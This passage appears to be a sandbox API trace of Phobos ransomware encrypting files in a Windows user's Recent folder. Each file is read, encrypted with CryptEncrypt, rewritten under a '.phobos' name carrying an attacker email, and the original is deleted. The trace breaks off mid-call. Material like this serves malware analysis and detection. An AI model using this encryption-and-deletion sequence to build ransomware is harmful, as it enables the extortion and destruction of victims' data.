[0200.050] CloseHandle (hObject=0x174) returned 1 [0200.050] CloseHandle (hObject=0x124) returned 1 [0200.050] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\903fT4zIThIEKTyMuT7D.ots.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\903ft4zithiektymut7d.ots.lnk")) returned 1 [0200.051] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0200.051] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AmiaAp.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\amiaap.mkv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.052] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2476) returned 1 [0200.052] CloseHandle (hObject=0x124) returned 1 [0200.052] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AmiaAp.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\amiaap.mkv.lnk")) returned 0x20 [0200.052] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AmiaAp.mkv.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\amiaap.mkv.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.052] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AmiaAp.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\amiaap.mkv.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.052] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.052] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.052] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AmiaAp.mkv.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\amiaap.mkv.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0200.053] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0200.053] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.053] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x9ac, lpOverlapped=0x0) returned 1 [0200.054] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x9b0, dwBufLen=0x9b0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x9b0) returned 1 [0200.054] WriteFile (in: hFile=0x174, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x9b0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x9b0, lpOverlapped=0x0) returned 1 [0200.055] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32be8) returned 1 [0200.055] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.055] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0200.055] CryptDestroyKey (hKey=0xa32be8) returned 1 [0200.055] WriteFile (in: hFile=0x174, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0200.055] CryptDestroyKey (hKey=0xa32a28) returned 1 [0200.055] CloseHandle (hObject=0x124) returned 1 [0200.055] CloseHandle (hObject=0x174) returned 1 [0200.056] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AmiaAp.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\amiaap.mkv.lnk")) returned 1 [0200.056] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0200.056] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AtpNnEA42Ofil.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\atpnnea42ofil.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.058] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=4042) returned 1 [0200.058] CloseHandle (hObject=0x124) returned 1 [0200.059] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AtpNnEA42Ofil.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\atpnnea42ofil.lnk")) returned 0x20 [0200.059] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AtpNnEA42Ofil.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\atpnnea42ofil.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.059] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AtpNnEA42Ofil.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\atpnnea42ofil.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.059] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.059] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.059] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AtpNnEA42Ofil.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\atpnnea42ofil.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0200.060] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32be8) returned 1 [0200.060] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.060] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xfca, lpOverlapped=0x0) returned 1 [0200.061] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xfd0, dwBufLen=0xfd0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xfd0) returned 1 [0200.061] WriteFile (in: hFile=0xac, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xfd0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xfd0, lpOverlapped=0x0) returned 1 [0200.062] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32868) returned 1 [0200.062] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.062] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0200.062] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.062] WriteFile (in: hFile=0xac, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0200.063] CryptDestroyKey (hKey=0xa32be8) returned 1 [0200.063] CloseHandle (hObject=0x124) returned 1 [0200.063] CloseHandle (hObject=0xac) returned 1 [0200.063] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AtpNnEA42Ofil.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\atpnnea42ofil.lnk")) returned 1 [0200.064] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0200.064] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\1b4dd67f29cb1962.automaticDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\1b4dd67f29cb1962.automaticdestinations-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0200.065] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=97280) returned 1 [0200.066] CloseHandle (hObject=0xac) returned 1 [0200.067] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\1b4dd67f29cb1962.automaticDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\1b4dd67f29cb1962.automaticdestinations-ms")) returned 0x20 [0200.067] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\1b4dd67f29cb1962.automaticDestinations-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\1b4dd67f29cb1962.automaticdestinations-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.067] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\1b4dd67f29cb1962.automaticDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\1b4dd67f29cb1962.automaticdestinations-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0200.067] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.067] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.067] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\1b4dd67f29cb1962.automaticDestinations-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\1b4dd67f29cb1962.automaticdestinations-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.068] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32be8) returned 1 [0200.068] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.068] ReadFile (in: hFile=0xac, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x17c00, lpOverlapped=0x0) returned 1 [0200.078] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x17c10, dwBufLen=0x17c10 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x17c10) returned 1 [0200.079] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x17c10, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x17c10, lpOverlapped=0x0) returned 1 [0200.081] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32868) returned 1 [0200.081] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.081] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x80, dwBufLen=0x80 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x80) returned 1 [0200.081] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.081] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x132, lpOverlapped=0x0) returned 1 [0200.081] CryptDestroyKey (hKey=0xa32be8) returned 1 [0200.081] CloseHandle (hObject=0xac) returned 1 [0200.081] CloseHandle (hObject=0x124) returned 1 [0200.081] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\1b4dd67f29cb1962.automaticDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\1b4dd67f29cb1962.automaticdestinations-ms")) returned 1 [0200.083] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0200.083] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\7e4dca80246863e3.automaticDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\7e4dca80246863e3.automaticdestinations-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0200.088] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=6656) returned 1 [0200.088] CloseHandle (hObject=0xac) returned 1 [0200.088] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\7e4dca80246863e3.automaticDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\7e4dca80246863e3.automaticdestinations-ms")) returned 0x20 [0200.088] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\7e4dca80246863e3.automaticDestinations-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\7e4dca80246863e3.automaticdestinations-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.088] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\7e4dca80246863e3.automaticDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\7e4dca80246863e3.automaticdestinations-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0200.088] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.088] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.088] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\7e4dca80246863e3.automaticDestinations-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\7e4dca80246863e3.automaticdestinations-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.089] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32868) returned 1 [0200.089] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.089] ReadFile (in: hFile=0xac, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x1a00, lpOverlapped=0x0) returned 1 [0200.166] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1a10, dwBufLen=0x1a10 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1a10) returned 1 [0200.166] WriteFile (in: hFile=0x160, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x1a10, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x1a10, lpOverlapped=0x0) returned 1 [0200.178] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa328e8) returned 1 [0200.178] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.178] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x80, dwBufLen=0x80 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x80) returned 1 [0200.178] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.178] WriteFile (in: hFile=0x160, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x132, lpOverlapped=0x0) returned 1 [0200.179] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.179] CloseHandle (hObject=0xac) returned 1 [0200.179] CloseHandle (hObject=0x160) returned 1 [0200.179] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\7e4dca80246863e3.automaticDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\7e4dca80246863e3.automaticdestinations-ms")) returned 1 [0200.180] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0200.180] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\b3hy_5529BUU.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\b3hy_5529buu.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0200.294] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=3908) returned 1 [0200.295] CloseHandle (hObject=0xfc) returned 1 [0200.295] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\b3hy_5529BUU.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\b3hy_5529buu.lnk")) returned 0x20 [0200.295] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\b3hy_5529BUU.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\b3hy_5529buu.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.295] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\b3hy_5529BUU.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\b3hy_5529buu.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0200.295] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.295] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.295] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\b3hy_5529BUU.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\b3hy_5529buu.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0200.296] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0200.296] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.296] ReadFile (in: hFile=0xfc, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xf44, lpOverlapped=0x0) returned 1 [0200.297] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xf50, dwBufLen=0xf50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xf50) returned 1 [0200.297] WriteFile (in: hFile=0x100, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf50, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf50, lpOverlapped=0x0) returned 1 [0200.298] CryptImportKey (in: hProv=0xa24cf8, 